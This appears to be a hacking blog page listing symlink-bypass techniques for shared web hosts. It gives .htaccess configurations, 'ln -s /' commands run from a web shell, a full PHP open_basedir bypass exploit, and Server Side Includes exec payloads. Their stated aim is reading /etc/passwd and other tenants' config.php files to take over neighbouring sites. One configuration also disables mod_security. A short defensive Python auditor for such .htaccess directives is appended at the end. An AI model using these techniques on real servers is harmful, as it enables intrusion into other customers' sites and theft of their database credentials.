Showing posts with label ByPass Symlink. Show all posts

Tuesday, 15 January 2013

HostGator, HostMonster priv8 bypass

First of all, create a directory called 'r4x' or anything.


Create a .htaccess file within the server, and add this code to it.


Code:
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html


or...



Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html




OK, once you've done that, backconnect to the server and go to the directory you created.

Then type this command:

"ln -s /"

Done. Server bypassed.


Easy tip: just create an old symlink already in the server folder, then exchange the .htaccess files that I posted.

NOTE: if this method doesn't work, it may have been patched, don't blame me.

use knowledge for good

PHP 5.3 SAFE MODE BYPASS (PHP SCRIPT) for SYMLINK

Usage:
  1. Execute it.
  2. In the box, type /etc/passwd
  3. Click on the button Create Symlink.


Code:
<?php
/*
PHP 5.2.12/5.3.1 symlink() open_basedir bypass
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit from <a
href="http://securityreason.com/" title="Security Audit PHP">Security Audit Lab - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form"
action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>';

if(empty($file))
   exit;

if(!is_writable("."))
   die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
   if(!file_exists($fakedir))
       mkdir($fakedir);
   chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
   if(!empty($hardstyle[$a])){
       if(!file_exists($hardstyle[$a]))
           mkdir($hardstyle[$a]);
       chdir($hardstyle[$a]);
       $as++;
   }
}
$as++;
while($as--)
   chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
   if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
   else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>


Steps to symlink manually using user/passwd

1. We have a shell on a Linux server and Safe Mode is OFF (if it is not off, put the file php.ini), and Disable Functions: None.

Code:
http://www.website.com/shell.php

and the directory:

/home/ueb/public_html/

2. Create a directory and name it "r00t" with the shell, using this command in "Command Execution":

mkdir r00t

3. Now we have to go into the directory:

Code:
/home/ueb/public_html/r00t

4. We write this code in Notepad on our computer and save it as .htaccess; this allows us to make symlinks and read PHP files on the server.

Code:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
We save the file as "All Files" and name it .htaccess.

5. This .htaccess file is uploaded to the server into the directory "r00t"; we do this with the Upload option of the shell.
We make sure that we upload .htaccess into the root directory and not into other directories like /home/ueb/public_html/!

6. After that, we type this command in the shell:

Code:
ln -s / root

With this we create a symlink to the root of the server.

7. Now we see what we have done:

Code:
http://website.com/r00t/root/

We now see the root of the server! Now we go into /home and see the users and other things; we can take control of other websites that are on the same server where we have the shell. If the /home directory shows Forbidden, then change the URL like this:

Code:
http://website.com/r00t/root/home/uebiob...ublic_html

Now see the files in the target!
Click on the document that has the configuration:

Code:
website..com/r00t/root/home/uebiobjektiv/public_html/install.php

enjoy hacking....

Shtml Bypass Symlink - via 404 Error

OK, now I'm going to show you how we can bypass symlink using Server Side Includes.

OK, let's start.
For this method we need to find a server with Server Side Includes.

Code:
cd /var/log/proftpd

more xferlog.*|grep victim.com

cat xferlog.*|grep victim.com


Now we run the command ourselves using an shtml file:
Code:
<!--#exec cmd="more xferlog.*|grep victim.com" -->


For example, the symlink:
ln -s /home/...../public_html/config.php config.txt
Come face to face.
Code:
<!--#exec cmd="ln -s /home/...../public_html/config.php config.txt" -->


I'll run the script that I wrote that I do not think that hatches from Litespeed.

Now, to read the config.txt file, I create an shtml file and use the following.
Code:
<!--#include virtual="config.txt" -->


So far so error 404
.htaccess
Code:
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml


Done!

This method mostly works on LiteSpeed Web Server.

Bypass Symlink

=============================================
Symlink bypass with the ini method
When you symlink /etc/passwd, you can read it,
but a symlink to /home/user/public_html/config.php responds with the error:
lscgid : execve() :/home/[patch]/public_html/
Now make a .htaccess file in the current directory and copy these contents into it:


then symlink with this command:


ln -s /home/user/public_html/config.php config.ini


You will see the error execve() :/home/[patch]/public_html/ is bypassed and you can
read config.ini.
====================================================


.htaccess file:


Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm


============================================================

Bypass Symlink 403 (forbidden) on litespeed


edit .htaccess to bypass the





Code:
<Files *.php>
ForceType application/x-httpd-php4
</Files>
<ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

Tuesday, 28 August 2012

Htaccess Bypass Symlink


Hi Guys :X

This Htaccess Is For Bypass Symlink... 
Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
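
From the hosting side, the .htaccess files in the posts above share a small set of directives: Options that turn on FollowSymLinks, Indexes or Includes, and AddType/AddHandler lines that stop .php files from being executed. The auditor below is an added example, not code from the blog; the rule set is a heuristic built from the directives quoted on this page, and the sample files are constructed.

```python
RISKY_OPTIONS = {"all", "followsymlinks", "indexes", "includes"}


def audit_htaccess(text):
    """Return (line_no, line, reason) for directives matching the rules below."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        name, args = parts[0].lower(), [a.lower() for a in parts[1:]]
        if name == "options":
            # "+X" and bare "X" switch an option on; "-X" switches it off.
            enabled = {a.lstrip("+") for a in args if not a.startswith("-")}
            hit = sorted(enabled & RISKY_OPTIONS)
            if hit:
                findings.append((no, line, "enables " + ",".join(hit)))
        elif name in ("addtype", "addhandler") and len(args) >= 2:
            exts = {a.lstrip(".") for a in args[1:]}
            # .php mapped to a non-PHP type/handler: source is not executed.
            if "php" in exts and "php" not in args[0]:
                findings.append((no, line, "remaps .php to " + args[0]))
        elif name == "secfilterengine" and args[:1] == ["off"]:
            findings.append((no, line, "disables mod_security filtering"))
    return findings


# Constructed samples: the first repeats directives quoted on this page,
# the second is an assumed benign file for contrast.
SUSPECT = """Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
"""
BENIGN = """Options -Indexes +SymLinksIfOwnerMatch
AddType text/html .shtml
"""

if __name__ == "__main__":
    for finding in audit_htaccess(SUSPECT):
        print(finding)
```

Restricting AllowOverride so that account-level .htaccess files cannot set Options or FileInfo directives removes the precondition these files depend on.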